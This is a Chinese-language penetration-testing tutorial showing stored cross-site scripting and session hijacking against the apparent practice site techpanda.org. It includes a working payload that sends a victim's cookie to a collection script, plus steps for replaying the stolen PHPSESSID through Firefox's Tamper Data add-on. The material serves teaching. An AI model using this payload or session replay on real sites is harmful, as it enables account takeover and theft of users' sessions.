黑客行為:入侵一個網站

在這個實際的場景中，我們將劫持位于www.techpanda.org(可能需要外網訪問)的web應用程序的用戶會話。我們將使用跨站點腳本來獲取cookie會話id，然后使用它來模擬一個合法的用戶會話。

假設攻擊者可以訪問web應用程序，并且他想劫持使用同一應用程序的其他用戶的會話。這種攻擊的目標可能是獲得對web應用程序的管理訪問權，假設攻擊者的訪問帳戶是有限的。

準備開始

• 打開http://www.techpanda.org/

• 登錄郵箱為[email protected]，密碼為Password2010

• 如果你已經成功登錄，那么你將跳轉到如下頁面

• 點擊Add New Contact
• 輸入以下內容作為first name

<a href=# onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape(document.cookie);">Dark</a>

上面的代碼使用了JAVAScript，它添加了一個帶有onclick事件的超鏈接。當不知情的用戶單擊該鏈接時，事件將檢索PHP cookie會話ID并將其連同URL中的會話ID一起發送到snatch_sess_id.php頁面

• 輸入如下所示的其余細節

• 點擊Save Changes

• 現在，你的儀表板將看起來像下面這樣

• 因為跨站點腳本代碼存儲在數據庫中，所以每次有訪問權限的用戶登錄時都會加載它

• 讓我們假設管理員登錄并單擊顯示為Dark的超鏈接

• 我們將獲得一個顯示在URL中的會話id的窗口

注意：腳本可以將值發送到存儲PHPSESSID的遠程服務器，然后用戶重定向回網站，就像什么都沒有發生一樣。

使用Firefox和Tamper Data插件來模擬會話

下面的流程圖顯示了完成這個練習必須采取的步驟。

• 你將需要Firefox web瀏覽器和Tamper Data插件來完成這部分
• 打開Firefox并安裝添加，如下圖所示

• 搜索tamper data，然后單擊安裝，如上所示

• 點擊Accept and Install…

• 當安裝完成時，單擊Restart now
• 如果菜單欄沒有顯示，請啟用它

• 單擊tools，然后選擇tamper data，如下所示

• 你將看到以下窗口。注意：如果窗戶不是空，點擊clear按鈕

• 點擊Start Tamper

• 切換回Firefox web瀏覽器，輸入http://www.techpanda.org/dashboard.php，然后按enter鍵加載頁面

• 你將從tamper data中得到以下彈出框

• 彈出窗口有三個選項。Tamper選項允許你在將HTTP頭信息提交給服務器之前修改它。

• 點擊它，你將看到以下窗口

• 復制從攻擊URL復制的PHP會話ID，并將其粘貼到等號后面。現在你的值應該是這樣的

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• 點擊OK按鈕
• 你將再次看到tamper data彈出窗口

• 取消Continue Tampering復選框
• 完成后單擊submit按鈕，你應該能夠看到如下所示的信息

注意：我們沒有登錄，我們使用使用跨站點腳本檢索到的PHPSESSID值模擬了一個登錄會話

希望通過這篇文章你們能夠對網絡滲透有一個初步了解。